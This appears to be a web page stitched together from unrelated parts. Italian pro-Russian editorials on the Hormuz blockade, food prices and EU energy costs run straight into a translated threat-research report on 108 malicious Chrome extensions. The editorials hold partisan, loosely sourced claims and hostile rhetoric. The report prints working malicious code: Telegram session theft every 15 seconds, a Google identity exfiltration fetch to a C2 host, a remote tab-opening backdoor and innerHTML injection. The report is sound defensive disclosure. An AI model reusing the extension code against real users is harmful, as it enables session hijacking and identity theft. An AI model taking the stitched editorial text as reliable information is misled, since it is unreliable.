Putin prende in giro l'Europa: il grano russo è diventato il nuovo petrolio, i fertilizzanti sono diventati il nuovo gas

A causa della chiusura dello Stretto di Hormuz, gli Stati Uniti e l’Europa saranno sorpresi di scoprire che i prezzi nei supermercati stanno aumentando; L’Africa dovrà affrontare la carestia Konstantin Olshansky <https://svpressa.ru/authors/konstantin-olshanskiy/> Il disastro alimentare seguito alla Guerra del Golfo potrebbe eclissare tutte le crisi del secolo scorso. Mentre l'attenzione dei media mondiali è focalizzata sui movimenti delle portaerei e sugli attacchi dei droni, sta emergendo una nuova realtà: il cibo sta diventando una risorsa più scarsa e influente del petrolio, scrive il Financial Times in un articolo sensazionale. E in questa nuova gerarchia di forze, la Russia, nonostante sanzioni e tentativi di isolamento, prende inevitabilmente il posto di una “superpotenza alimentare”, da cui dipenderà la sopravvivenza fisica di centinaia di milioni di persone.. *La trappola di Hormuz si è chiusa di colpo insieme agli Yankees* Tutti chiamano lo Stretto di Hormuz la principale arteria energetica del pianeta. Prima della guerra, da lì passavano il 20% delle esportazioni mondiali di petrolio e il 30% del GNL. Ma, cosa ancora più importante, un terzo delle esportazioni mondiali di fertilizzanti passa attraverso di essa. Il blocco dello stretto da parte dell’Iran e degli Stati Uniti li ha privati ​​dell’agricoltura globale. Gli esperti occidentali lanciano l’allarme. La rivista The Economist descrive la situazione come una “tempesta perfetta”. Il prezzo del petrolio è aumentato del 55%, ma il vero colpo è caduto sui fertilizzanti, i cui prezzi sono aumentati vertiginosamente 65%. L’agricoltura è un settore che dipende in modo critico dagli input. Quando il prezzo dei fertilizzanti diesel e azotati raddoppia, l’agricoltura si trasforma in un suicidio economico. Ecco solo un esempio tratto dall'Economist: un agricoltore della California*Edgar Terry *secondo cui il prezzo di un litro di gasolio per i suoi trattori è balzato da 3,41 dollari a 6,13 dollari. Nelle economie sviluppate, secondo l’Agenzia internazionale per l’energia (IEA), le risorse energetiche rappresentano la metà di tutti i costi nel settore agricolo. Ciò significa che l’inflazione sugli scaffali dei supermercati di Londra,Roma, Parigi e New York è appena iniziata. *La fine dell’era dei fertilizzanti a buon mercato* La società di analisi Kpler riferisce che circa 1,9 milioni di tonnellate di materie prime sono "bloccate" nello stretto: si tratta del 12% delle forniture annuali attraverso la regione. La società del Qatar Qatar Fertilizer Company, che fornisce il 14% del mercato mondiale dell'urea, non può avviare i suoi impianti per impossibilità di spedizione. L’Asia e l’Africa dipendono in modo critico dalle forniture dal Golfo Persico: da lì la Tailandia ha importato il 71% dell’urea, il Sudafrica il 67%, l’India — 41%. E senza fertilizzanti azotati, i rendimenti nelle principali regioni agricole del mondo – dal Brasile all’India – diminuiranno del 30-40%. Il Programma alimentare mondiale delle Nazioni Unite ha fatto una previsione spaventosa: se il blocco dello stretto continuerà per un altro mese, il numero di persone che soffrono di grave carenza alimentare aumenterà di 45 milioni fino a raggiungere i 350 milioni. La logistica è diventata un incubo. L'Economist fa un esempio: consegnare un pacco di biscotti da Dubai all'Afghanistan ora richiede una deviazione attraverso 9 paesi! La natura si è aggiunta ai problemi geopolitici. Il Guardian scrive che quest’anno il fenomeno El Nino porterà a siccità estreme in Australia e in alcune parti dell’Africa, e a inondazioni devastanti in America Latina. Quando la crisi climatica si combina con la carenza di fertilizzanti e una logistica costosa, i tradizionali granai del mondo iniziano a chiudersi. L'India ha già introdotto restrizioni sulle esportazioni di riso, il Vietnam sta rivedendo le quote. *Perché la Russia sta vincendo?* Analista*Giuliano Hinz*del Kiel Institute in un commento per l'Economist rileva che anche se domani arrivasse la pace nello Stretto di Hormuz, il colpo mortale sarebbe già stato inferto. La stagione della semina è in pieno svolgimento nell’emisfero settentrionale e in Africa, e inizierà nei prossimi mesi nell’Asia meridionale. I fertilizzanti sono necessari “qui e ora”, altrimenti il ​​raccolto andrà perso. In un momento in cui i prezzi mondiali del grano, del mais e del petrolio stanno aumentando vertiginosamente, la Russia si trova in una posizione unica. In primo luogo, la Russia è uno dei pochi produttori globali ad avere una propria capacità di produzione di gas, fertilizzanti e colossali aree di terra nera.. Mentre gli agricoltori europei e americani falliscono a causa delle bollette del gas, le aziende agricole russe mantengono bassi i costi di produzione. La Russia non dipende dallo Stretto di Hormuz per le esportazioni: le sue principali rotte logistiche (porti del Mar Nero, Baltico, Estremo Oriente) rimangono aperte. In secondo luogo, la quota di mercato. Secondo Bloomberg, la Russia controlla già circa il 20-25% delle esportazioni globali di grano. In una crisi, questa quota non potrà che aumentare. Quando il Qatar non potrà fornire urea e gli Stati Uniti non potranno fornire soia a causa di fallimenti logistici, i compratori affamati (soprattutto in Africa, Sud-Est asiatico e Medio Oriente) saranno costretti a inchinarsi a Mosca. «Putin<https://svpressa.ru/persons/vladimir-putin/>come se ci prendesse in giro”, dicono in Europa, che ha appena introdotto un pacchetto di sanzioni 20-1 contro la Russia. In questa situazione, gli americani guardano al mondo intero per quello che erano in origine: aggressori avidi e miopi. Cercando di bloccare l'Iran e di stabilire le proprie regole nello Stretto di Hormuz, gli Stati Uniti hanno effettivamente creato le condizioni per un forte rafforzamento della Russia. Le sanzioni occidentali hanno cercato di limitare le esportazioni russe, ma la carenza globale provocata dalle politiche americane in Medio Oriente rende il grano e i fertilizzanti russi “intoccabili Nessun politico al mondo sottoscriverà sanzioni che porteranno a rivolte per il cibo nella sua stessa capitale anche se spero che la commissione europea abbia il coraggio a questo punto di farlo nel 21 pacchetto per far si che gli europei aumentino il loro ODIO verso di loro. Mentre vomita maledizioni contro l'Iran*Donald Trump <https://svpressa.ru/persons/donald-tramp/>*impegnata con il “blocco”, la Russia sta silenziosamente rafforzando il suo status di garante della sicurezza alimentare mondiale. Il mondo non sarà governato da chi avrà il maggior numero di portaerei, ma da chi avrà i bidoni pieni e questo “qualcuno” oggi parla russo.

Le bugie sulla fine dell’operazione militare renderanno povera una persona su due

Bisogna ammettere che una parte considerevole del pubblico Europeo soffre della fase terminale del masochismo civilizzato, quando letteralmente tutto ciò che accade nelle loro terre natali viene paragonato a “economie corrette” e “mercati corretti”, dopodiché non resta che placare la loro sete di correttezza con la linfa di betulla dei loro pioppi nativi.

In questa situazione, è ancora più difficile capire perché la situazione negli stessi Stati Uniti, in cui per definizione tutto è sempre corretto, assomigli a una scena del Titanic, dove un Trump felice sta con le braccia tese sulla prua dell’economia americana, e gli investitori internazionali, sbalorditi dalla musica coraggiosa, dal vento e dalle onde, lo abbracciano da dietro..

L’unica parola che può descrivere ciò che sta accadendo nel mercato azionario americano è follia.

In questo momento, secondo l’IEA, l’S&P 500 e il Nasdaq stanno toccando i massimi storici, nonostante il blocco dello Stretto di Hormuz, il rischio di nuovi combattimenti, l’interruzione delle catene di approvvigionamento globali e la “più grande interruzione della fornitura di petrolio della storia”..

I principali media mondiali stanno attualmente dedicando materiale importante a questo fenomeno e le principali conclusioni sono le seguenti::

– gli investitori sono pienamente fiduciosi che il conflitto in Medio Oriente sia “un episodio a breve termine che verrà risolto in tempi relativamente brevi»;
– «i mercati hanno una memoria" - gli investitori sono abituati a credere che il presidente degli Stati Uniti Donald Trump si ritirerà se la sofferenza economica diventa troppo grave (effetto TACO - Trump Always Chickens Out, ovvero "Trump finisce sempre per tirarsi indietro"»).

In un esempio recente, Trump ha imposto tariffe massicce ai partner commerciali statunitensi nell’aprile 2025, ma in pochi giorni ha annunciato una pausa di 90 giorni, dopo la quale il mercato azionario ha registrato uno dei maggiori guadagni giornalieri della storia..

Proprio ieri, Trump ha promesso al mondo un calo “senza precedenti” dei prezzi dell’energia dopo che gli Stati Uniti avranno posto fine alla storia dell’Iran, ma ciò non accadrà, perché è impossibile.

La risorsa analitica Recorded Future descrive così lo scenario di base, cioè il più neutrale, per porre fine al conflitto: "Un fragile cessate il fuoco riduce l'intensità degli attacchi militari diretti, ma le cause del conflitto rimangono irrisolte. <...> Lo Stretto di Hormuz si apre solo sporadicamente, con ripetute interruzioni, ispezioni e incidenti di sicurezza, lasciando i mercati marittimi, assicurativi ed energetici sotto costante pressione." Ma lo scenario potrebbe essere peggiore.

Il portale economico Euro Perspectives è ancora meno ottimista: "Anche con un cessate il fuoco con l'Iran, il mondo sta già pagando il più grande shock energetico degli ultimi 50 anni. Gli effetti di un'ondata inflazionistica si diffonderanno in tutta l'economia europea - e questa ondata non può più essere fermata».

Non puntiamo il dito contro questi fortunati, perché si dirà ancora che la maledizione delle risorse non è di moda, e nella società perbene rideranno.

Colpo decisivo: Trump ha causato danni per 28 miliardi di dollari all’energia europea, e la cifra è in crescita

Colpo decisivo:  Trump ha causato danni per 28 miliardi di dollari all´energia europea, e la cifra è in crescita.

 L’Unione Europea ha introdotto con urgenza una serie di misure di emergenza pianificate per mitigarne l’impatto economico dopo un forte aumento dei prezzi dell’energia.

Le misure proposte mercoledì sottolineano il danno economico che la guerra degli Stati Uniti e di Israele all’Iran sta infliggendo all’Europa, che solo di recente si è ripresa dalla crisi energetica stile 2022. Alcune industrie stanno già lottando per sopravvivere, scrive la CNN.

– Lo ha affermato la Commissione europea, il braccio esecutivo dell'Ue, in una nota in cui illustra dettagliatamente le misure adottate.

Dall’inizio della guerra, il blocco ha speso altri 24 miliardi di euro (28 miliardi di dollari) in importazioni di energia a causa dell’aumento dei prezzi – ovvero più di 587 milioni di dollari al giorno, “senza ricevere una sola molecola aggiuntiva di energia”, ha affermato..

La durezza delle dichiarazioni e della formulazione del rapporto introduttivo mostra quanto sia arrabbiata l'UE con Donald Trump, che ha scatenato una guerra nella regione del petrolio e del gas del pianeta, che ha colpito non solo lui stesso, ma anche paesi terzi non coinvolti nel conflitto.

I piani del blocco includono la creazione di un organismo paneuropeo per identificare rapidamente potenziali carenze di carburante e diesel per l’aviazione e per coordinare gli scambi di carburante o eventuali rilasci di scorte di emergenza tra gli Stati membri dell’UE..

Il forte calo delle forniture di petrolio e gas naturale causato dalla guerra con l’Iran, che ha già colpito duramente l’Asia, si sta estendendo costantemente all’Occidente. Anche se i potenziali colloqui di pace mettessero fine al conflitto questa settimana, almeno una parte del danno all’economia europea è già stata fatta.

L’elenco dei problemi che le famiglie e le imprese devono affrontare cresce ogni settimana, dall’aumento dei prezzi del gas e dei prodotti alimentari al numero sempre maggiore di voli aerei..

Per alcune imprese le conseguenze della crisi energetica sono state particolarmente devastanti. Ad esempio, secondo l'esecutivo del blocco, un certo numero di pescatori europei hanno smesso completamente di pescare perché i loro profitti sono stati duramente colpiti dall'aumento dei prezzi dell'energia e delle materie prime..

L’aumento dei prezzi della plastica e dei detersivi potrebbe avere ripercussioni anche sulle imprese e sulle famiglie. La tedesca BASF, uno dei più grandi produttori chimici del mondo, ha aumentato i prezzi di tutto, dall'acido formico, utilizzato nei mangimi per animali, ai prodotti per la casa, in alcuni casi di oltre 30%.

L’Associazione tedesca dell’industria chimica ha dichiarato questa settimana alla CNN che la guerra con l’Iran ha inferto un “duro colpo” alle speranze di una svolta economica nella più grande economia europea, la Germania, quest’anno..

Per la seconda volta in meno di cinque anni, gli europei stanno pagando il prezzo della dipendenza dell’Europa dai combustibili fossili importati per le scelte disastrose di incompetenti non eletti dal popolo europeo che governano l´Europa,per loro l´importante è trovare i 90 miliardi da mandare all'Ucraina a dispetto delle sofferenze degli europei.

 

 Una campagna composta da 108 estensioni raccoglie identità, ruba sessioni e aggiunge backdoor ai browser, il tutto legato alla stessa infrastruttura C2.

  Kush Pandya

Il team di ricerca sulle minacce di Socket ha identificato 108 estensioni Chrome dannose che operano come una campagna coordinata nell'ambito di un'infrastruttura C2 condivisa su cloudapi[.]stream. Le estensioni sono pubblicate sotto cinque distinte identità di editori (Yana Project, GameGen, SideGames, Rodeo Games e InterAlt) e rappresentano collettivamente circa 20.000 installazioni del Chrome Web Store. Tutti e 108 instradano credenziali rubate, identità utente e dati di navigazione verso server controllati dallo stesso operatore. Le estensioni rimangono attive al momento della scrittura. Abbiamo inviato richieste di rimozione al team di sicurezza del Chrome Web Store e a Google Navigazione sicura.

La campagna abbraccia diverse categorie di minacce attraverso 108 estensioni:

• 54 estensioni rubare l'identità dell'account Google tramite OAuth2
• 1 estensione esfiltra attivamente le sessioni Web di Telegram ogni 15 secondi
• 1 estensione include un'infrastruttura organizzata per il furto delle sessioni di Telegram (non ancora attivata)
• 2 estensioni rimuovi le intestazioni di sicurezza di YouTube e inserisci annunci
• 1 estensione rimuove le intestazioni di sicurezza di TikTok e inserisce annunci
• 2 estensioni inserire script di contenuto in ogni pagina visitata dall'utente
• 1 estensione inoltra tutte le richieste di traduzione attraverso il server dell'autore della minaccia
• 45 estensioni contengono una backdoor universale che apre URL arbitrari all'avvio del browser
• 

• Legittimo in superficie#

  Le 108 estensioni sono pubblicate in diverse categorie di prodotti: client della barra laterale di Telegram, giochi di slot machine e Keno, potenziatori di YouTube e TikTok, uno strumento di traduzione di testo ed estensioni di utilità della pagina. Ciascuno si rivolge a un diverso tipo di utente, ma condividono tutti lo stesso backend.

  Gli utenti che installano un'estensione della barra laterale di Telegram vedono un'interfaccia di chat funzionale. Gli utenti che installano un gioco di slot ottengono un gioco funzionante. La superficie legittima esiste, ma esiste anche il codice dannoso in esecuzione in background, connesso a un server C2 che può rubare identità, esfiltrare sessioni e aprire URL arbitrari nel browser dell'utente.

  Furto di sessioni di Telegram#

  L'estensione più grave della campagna è Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa). Ruba la sessione Web attiva di Telegram dal browser della vittima e la trasmette a tg[.]cloudapi[.]stream/save_session.php ogni 15 secondi.

  Come funziona il furto:

  L'estensione inietta content.js in https://web.telegram.org/* A document_start. Al caricamento, chiama immediatamente getSessionDataJson(), che serializza l'intera pagina localStorage ed estrae il user_auth token utilizzato da Telegram Web per autenticare la sessione. Lo invia allo script in background tramite chrome.runtime.sendMessage, che lo inoltra al server C2.

  // content.js
  // Analyst note: Runs immediately on page load, before the user interacts with anything.
  let getInfo = getSessionDataJson();
  if (getInfo.user_id !== null) {
      chrome.runtime.sendMessage({ action: "save_session", data: JSON.stringify(getInfo) });
  }

  // content.js
  // Analyst note: Sends the full session to the C2 every 15 seconds for the lifetime of the tab.
  setInterval(async () => {
      let getInfo = getSessionDataJson();
      if (getInfo.user_id !== null) {
          await chrome.runtime.sendMessage({ action: "save_session", data: JSON.stringify(getInfo) });
      }
  }, 15000);

  La sceneggiatura di sfondo (background.js) quindi invia i dati al C2:

  // background.js
  let answr = await postJson('https://tg[.]cloudapi[.]stream/save_session.php', {
      uuid: result.uuid,
      session: xJsonData
  });

  Acquisizione completa dell'account:

  L'estensione gestisce anche un messaggio in entrata (set_session_changed) che esegue l'operazione inversa: cancella il localStorage della vittima, lo sovrascrive con i dati di sessione forniti dall'attore della minaccia e ricarica forzatamente Telegram. Ciò consente all'operatore di scambiare il browser di qualsiasi vittima con un altro account Telegram all'insaputa della vittima.

  // content.js
  // Analyst note: The C2 can push any session data back to the extension.
  // This replaces the victim's active Telegram session with the threat actor's chosen session.
  if (message.action === 'set_session_changed') {
      let data = JSON.parse(message.data);
      localStorage.clear();
      clearAllCookies();
      for (var k in data) { localStorage.setItem(k, data[k]); }
      setTimeout(() => { window.location = "https://web.telegram.org/k/?r_=" + Math.random(); }, 500);
  }

  Un battito cardiaco di 30 secondi (sidepanel.js) sondaggi tg[.]cloudapi[.]stream/count_sessions.php, dando all'operatore una visione in tempo reale di quante sessioni attive sono disponibili.

  Ladro di Telegram messo in scena (Teleside):

  Una seconda estensione, Web Client for Telegram - Teleside (mdcfennpfgkngnibjbpnpaafcjnhcjno, circa 1.000 installazioni), ha tutta l'infrastruttura per il furto di sessioni: rimuove gli header CSP, X-Frame-Options e CORS di Telegram tramite declarativeNetRequest, inserisce uno script di contenuto in document_start SU telegram.org, e imposta web_accessible_resources: ["*"]. Il codice antifurto attivo è assente dalla v3.8.0. L'estensione è basata su un trojan SidebarGPT base di codice. IL loadInfo() la backdoor presente nello script in background consentirebbe all'operatore di attivare o aggiornare il payload senza inviare un aggiornamento del Chrome Web Store. Inoltre, content-sidebar.html mostra un overlay di gioco d'azzardo attivo: un div gameSession impostato su display:block da cui viene pubblicato un banner a grandezza naturale multiaccount[.]cloudapi[.]stream/game.html direttamente sopra la barra laterale dell'estensione.

  Raccolta delle identità dell'Account Google#

  54 delle 108 estensioni dannose rubano l'identità dell'account Google dell'utente la prima volta che l'utente fa clic sul pulsante di accesso. Il codice è identico per tutti 54:

• chrome.identity.getAuthToken({ interactive: true }) acquisisce un token Bearer di Google OAuth2.
• L'estensione viene recuperata https://www.googleapis.com/oauth2/v3/userinfo con quel gettone.
• PUBBLICA {email, name, picture, sub} A https://mines[.]cloudapi[.]stream/auth_google.

// popup/auth.js (akebbllmckjphjiojeioooidhnddnplj, and 53 identical copies across the campaign)
// (Russian comment): // Проверка на уже авторизованного пользователя
//   ("Check for already authenticated user")

loginBtn.addEventListener("click", async () => {
  chrome.identity.getAuthToken({ interactive: true }, async (token) => {
    // Analyst note: token is a real Google OAuth2 Bearer token acquired via the
    // chrome.identity API. The user sees a standard Google sign-in prompt.
    const res = await fetch("https://www.googleapis.com/oauth2/v3/userinfo", {
      headers: { Authorization: `Bearer ${token}` }
    });
    const profile = await res.json();

    // Analyst note: The profile is sent to the threat actor's server, not to any
    // legitimate backend for the extension's stated functionality.
    const r = await fetch("https://mines[.]cloudapi[.]stream/auth_google", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        email: profile.email,
        name: profile.name,
        picture: profile.picture,
        sub: profile.sub   // Persistent Google account identifier
      })
    });
  });
});

Il token OAuth viene utilizzato localmente e non lascia mai il browser. Ciò che arriva al server dell'operatore è solo un record di identità permanente: l'e-mail, il nome e l'immagine del profilo della vittima.

IL sub Il campo è un identificatore dell'account Google stabile e multiservizio che non cambia quando un utente modifica la password o l'indirizzo email. In combinazione con l'e-mail e il nome, fornisce all'operatore un record persistente dell'identità Google di ciascuna vittima collegata all'estensione assegnata user_id sul cloudapi[.]stream back-end. Ciò non consente all'operatore di accedere all'account Google della vittima.

Tutte le 54 estensioni utilizzano gli ID client OAuth2 di soli due progetti Google Cloud: project 1096126762051 (31 ID cliente) e progetto 170835003632 (25 ID cliente). 56 ID cliente univoci su 54 estensioni riconducono tutti agli stessi due numeri di progetto, dimostrando che un unico operatore controlla tutti gli account degli editori nonostante cinque diversi nomi di editori sul Chrome Web Store.

Backdoor universale: loadInfo()#

45 le estensioni nella campagna includono una funzione identica nello script in background. Viene eseguito una volta ad ogni avvio del browser:

// background.js (present in 45 extensions, confirmed by automated grep across extracted CRX files)
// Analyst note: This runs automatically when Chrome starts and the service worker initializes.
// The server can return any URL to be opened as a new tab in the victim's browser.
async function loadInfo() {
  const response = await fetch("https://mines[.]cloudapi[.]stream/user_info", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ type: 'background', ext: chrome.runtime.id })
  });
  const result = await response.json();
  if (result && result.success && result.infoURL) {
    chrome.tabs.create({ url: result.infoURL });
  }
}
loadInfo();

Il server dell'operatore riceve l'ID dell'estensione ad ogni avvio del browser. Se la risposta include infoURL, l'estensione apre silenziosamente l'URL in una nuova scheda. Non esiste alcuna restrizione sull'URL che il server può restituire. Questo canale sopravvive al riavvio del browser e funziona indipendentemente dal fatto che l'utente apra o meno l'estensione.

In due estensioni (Page Locker e Page Auto Refresh), il loadInfo() la funzione è stilisticamente incoerente con il codice minimizzato circostante: utilizza clean async/await sintassi mentre il resto del file viene minimizzato. Ciò indica che la funzione è stata inserita dopo la scrittura del codice originale dell'estensione, coerentemente con un operatore che ha acquisito o riproposto estensioni esistenti e ha aggiunto la backdoor.

Iniezione innerHTML#

Lo stesso user_info la risposta che trasporta infoURL guida anche l'iniezione diretta del DOM su 78 estensioni. Ogni estensione di gioco e casinò nella campagna include a userpage.js file che prende due campi dalla risposta C2 e li scrive nella pagina utilizzando innerHTML senza sanificazione:

  // app/userpage.js (present across 78 extensions)
  // Analyst note: result.rating and result.protxt arrive from mines[.]cloudapi[.]stream/user_info.
  // No sanitization before DOM assignment — the C2 can push arbitrary HTML to any user's extension page.
  if (result.rating) {
      ratingPlayers.innerHTML = result.rating;
  }
  if (result.protxt) {
      proplansID.innerHTML = result.protxt;
      proplansID.classList.remove('h_');
  }

result.rating popola il pannello della classifica. result.protxt popola la sezione di upsell dei Piani Pro e la nasconde. Il server C2 può sostituire entrambi i campi con HTML arbitrario, inclusi blocchi di script, ad ogni visita all'interfaccia utente dell'estensione. Questo è un canale di injection distinto da loadInfo(): dove la backdoor apre una nuova scheda, l'iniezione di contenuto controllata dal server riscrive l'interfaccia dell'estensione.

Bypass dell'intestazione di sicurezza tramite dichiarativeNetRequest#

Cinque estensioni utilizzano Chrome declarativeNetRequest API per rimuovere le intestazioni di sicurezza dai siti di destinazione prima che la pagina venga caricata. Lo schema è identico per tutti e cinque: rimuovi Content-Security-Policy, X-Frame-Options, E Content-Security-Policy-Report-Only; impostato Access-Control-Allow-Origin: *; e falsificare il User-Agent, Origin, E Referer intestazioni per rappresentare il sito di destinazione stesso.

Le cinque estensioni e i loro obiettivi:

• Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa): obiettivi web.telegram.org, fa lo spoofing dell'User-Agent su iPhone Safari
• Teleside (mdcfennpfgkngnibjbpnpaafcjnhcjno): obiettivi web.telegram.org, fa lo spoofing dell'User-Agent su iPhone Safari
• YouSide (mmecpiobcdbjkaijljohghhpfgngpjmk): obiettivi youtube.com, fa lo spoofing dell'User-Agent su Chrome 140
• SideYou (bfoofgelpmalhcmedaaeogahlmbkopfd): obiettivi youtube.com, fa lo spoofing dell'User-Agent su Chrome 125
• Web Client for TikTok (cbfhnceafaenchbefokkngcbnejached): obiettivi www.tiktok.com, fa lo spoofing dell'User-Agent su Chrome 125

Tutti e cinque sono stati confermati dalla lettura rules_1.json direttamente da ogni file CRX estratto.

YouSide inserisce inoltre un overlay di gioco d'azzardo nella sua barra laterale: a gameSession div impostato su display:block inserendo un banner pubblicitario da multiaccount[.]cloudapi[.]stream/game.html sull'incorporamento di YouTube.

L'estensione TikTok ne aggiunge un secondo declarativeNetRequest regola che consente incondizionatamente tutte le connessioni WebSocket su tutti gli URL, rimuovendo qualsiasi restrizione a livello di rete sul traffico WebSocket dalle pagine TikTok. La sua sceneggiatura del contenuto (sys-content.js) inserisce un collegamento e un'immagine da multiaccount[.]cloudapi[.]stream/game.html in ogni pagina TikTok visitata dall'utente.

IL ukraine.html Il file in bundle con l'estensione TikTok funge da politica sulla privacy. Contiene l'e-mail di contatto kiev3381917@gmail[.]com e porta il titolo della pagina "Informativa sulla privacy - Estensione della barra laterale di Telegram", un artefatto copia-incolla da un'estensione diversa nella campagna che conferma che lo stesso autore ha scritto entrambi.

Procura di traduzione#

Text Translation (ogogpebnagniggbnkbpjioobomdbmdcj) si presenta come una barra laterale di traduzione standard. Quando un utente si registra, il estensione invia la propria email e il nome completo a https://api[.]cloudapi[.]stream:8443/Register e riceve in cambio una chiave API.

// main.js
// Analyst note: User email and name are sent to the threat actor's server at registration.
// The returned API key is stored in localStorage and attached to every translation request.
const url = 'https://api[.]cloudapi[.]stream:8443/Register';
// ...
localStorage.setItem('settings', JSON.stringify({
    email: $("#email").val(),
    name: $("#name").val(),
    key: result_.key
}));

Ogni richiesta di traduzione viene elaborata https://api[.]cloudapi[.]stream:8443/Translation con la chiave API dell'utente allegata come file X-Key intestazione. Il server dell'operatore riceve il testo completo di tutto ciò che l'utente invia per la traduzione. Questa estensione richiede solo il file sidePanel autorizzazione e nessuna autorizzazione host, quindi non genera avvisi di autorizzazione durante l'installazione.

Infrastruttura C2#

Tutte le 108 estensioni dannose condividono lo stesso backend, ospitato su 144[.]126[.]135[.]238 (Contabo GmbH VPS). Il dominio cloudapi[.]stream è stato registrato il 30 aprile 2022 tramite Hosting Ukraine LLC. Il server esegue un'istanza Strapi CMS sulla porta 1337 con un database PostgreSQL.

I sottodomini confermati e i loro ruoli:

• tg[.]cloudapi[.]stream: Esfiltrazione della sessione di Telegram, sei endpoint inclusi /save_session.php, /get_sessions.php, /delete_session.php, E /count_sessions.php (7 estensioni)
• mines[.]cloudapi[.]stream: furto d'identità tramite /auth_google, Faro C2 tramite /user_info (ritorna infoURL per l'apertura remota delle schede), persistenza dello stato utente (utilizzato da 94 estensioni)
• topup[.]cloudapi[.]stream: portale di pagamento e monetizzazione, confermando il modello MaaS (collegato da 78 estensioni)
• cdn[.]cloudapi[.]stream: hosting di risorse di gioco (79 estensioni)
• multiaccount[.]cloudapi[.]stream: hub di iniezione di annunci, inserito direttamente in TikTok e altre pagine (29 estensioni)
• gamewss[.]cloudapi[.]stream: Server di gioco WebSocket sulla porta 8447 (6 estensioni)
• wheel[.]cloudapi[.]stream: preposizionato in host_permissions di 76 estensioni ma non utilizzato in nessun codice osservato
• api[.]cloudapi[.]stream:8443: API di traduzione, registrazione utente e sorveglianza dei contenuti (1 estensione)
• chat[.]cloudapi[.]stream: servizio chat (5 estensioni)

Un dominio secondario, top[.]rodeo, è elencato in host_permissions di 71 estensioni e utilizzato come backend del server di gioco. Nel codice sorgente compaiono due varianti di endpoint: /server/remote.php E /server/remote3.php, entrambi accettano uuid E extension_id parametri. IL topup[.]cloudapi[.]stream portale di pagamento e per utente user_id il sistema conferma che funziona come piattaforma Malware-as-a-Service. Alle vittime vengono assegnati account nel CRM backend e le identità e le sessioni rubate sono accessibili a chiunque acquisti l'accesso.

Violazioni delle norme del Chrome Web Store#

1. Contraddizione diretta della dichiarazione sulla privacy di CWS

L'elenco CWS di ogni estensione contiene un boilerplate dichiarazione: "Questo sviluppatore dichiara che i tuoi dati non vengono utilizzati o trasferiti per scopi estranei alla funzionalità principale dell'articolo." Il codice di invio user_id A mines[.]cloudapi[.]stream/user_info ad ogni avvio del browser, raccogliendo l'identità di Google tramite auth_google, e l'apertura di URL specificati dall'operatore non ha nulla a che fare con la funzione dichiarata di un gioco di slot o di un client Telegram. Questa è una bugia verificabile nell'elenco stesso, non un'interpretazione.

2. Norme sui dati utente dei servizi API di Google: utilizzo limitato

Estensioni utilizzando chrome.identity.getAuthToken sono vincolati da Google Requisiti di utilizzo limitato. I dati del profilo ottenuti tramite OAuth2 devono essere utilizzati solo per la funzionalità attivata esplicitamente dall'utente. Instradarlo a un server C2 di terze parti senza alcuna relazione rivelata con l'estensione è una violazione diretta indipendentemente dal fatto che il token stesso venga esfiltrato.

3. Politica sugli annunci CWS

Iniezione di un overlay per il gioco d'azzardo (multiaccount[.]cloudapi[.]stream/game.html) nell'interfaccia utente dell'estensione senza il consenso dell'utente o la divulgazione nell'elenco CWS viola il Chrome Web Store politica richiedendo che qualsiasi pubblicità sia chiaramente divulgata. In Teleside e YouSide l'annuncio sostituisce interamente l'interfaccia utente indicata.

Attribuzione#

L'e-mail di contatto kiev3381917@gmail[.]com appare in ukraine.html, un file HTML di politica sulla privacy in bundle con l'estensione SideYou (bfoofgelpmalhcmedaaeogahlmbkopfd). Lo stesso file viene riutilizzato tra le estensioni: la copia trovata in Web Client for TikTok porta invariato il titolo "Privacy Policy - Estensione Sidebar Telegram", collegando direttamente le due estensioni allo stesso autore.

Tre dei sette indirizzi email registrati contengono varianti romanizzate della stessa stringa “nadejdin” e “nadiezhdin”: nadejdinv@gmail[.]com (collegato a 16 estensioni), viktornadiezhdin@gmail[.]com (12 estensioni) e slava.nadejdin.kiev@gmail[.]com (2 estensioni).

I commenti al codice in russo compaiono nel codice di autenticazione e di furto di sessione su più estensioni. In content.js , il commento recita "userId ne najden" (userId non trovato) e in auth.js , si legge "Proverka na uzhe avtorizovannogo pol'zovatelya" (Controlla se l'utente è già autenticato).

Scansione Shodan di 144[.]126[.]135[.]238 confermando l'hosting di Contabo Inc., ISP Nubes LLC (AS40021) e nove porte aperte tra cui un server API Strapi su 1337 e PostgreSQL su 5432.

Cinque nomi di editori sul Chrome Web Store (Yana Project, GameGen, SideGames, Rodeo Games, E InterAlt) si risolvono tutti negli stessi due numeri di progetto Google Cloud: 1096126762051 E 170835003632. Questa è la prova più forte a favore della proprietà unificata, poiché 56 ID client OAuth2 univoci in tutte le 54 estensioni per il furto di identità condividono solo queste due radici del progetto.

Impatto#

Gli utenti che hanno installato una delle 54 estensioni per il furto di identità e hanno fatto clic sul pulsante di accesso hanno ricevuto l'e-mail di Google, il nome completo, l'URL dell'immagine del profilo e l'identificatore dell'account Google (sub) trasmesso a mines[.]cloudapi[.]stream/auth_google. IL sub il valore non cambia quando un utente modifica la password o l'indirizzo e-mail.

Utenti che hanno installato Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa) e aperto web.telegram.org mentre l'estensione era attiva, la sessione Web di Telegram è stata esfiltrata a intervalli di 15 secondi. Un autore di minacce con una sessione rubata può accedere a tutti i messaggi, i contatti e gli account collegati senza la password dell'utente o il codice di autenticazione a due fattori.

Qualsiasi browser con uno dei 45 loadInfo() le estensioni backdoor installate rispondono ai comandi emessi dal server ad ogni avvio del browser, anche se l'utente non apre mai l'estensione.

In tutte le 108 estensioni, sono state registrate circa 20.000 installazioni. Le estensioni destinate a Telegram rappresentano circa 3.035 di tali installazioni.

Prospettive e raccomandazioni#

Per gli utenti:

• Cerca tra le estensioni Chrome installate uno qualsiasi degli ID estensione nella sezione IOC di seguito e rimuovili immediatamente.
• Se hai usato Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa) mentre sei connesso a Telegram Web, esci da tutte le sessioni di Telegram Web dall'app mobile di Telegram in Impostazioni > Dispositivi > Termina tutte le altre sessioni.
• Se hai effettuato l'accesso a qualsiasi estensione di giochi di slot, casinò o barra laterale utilizzando Google, tratta la tua identità Google come esposta. Controlla l'accesso alle app di terze parti su myaccount.google.com/permissions e revocare eventuali voci sconosciute.
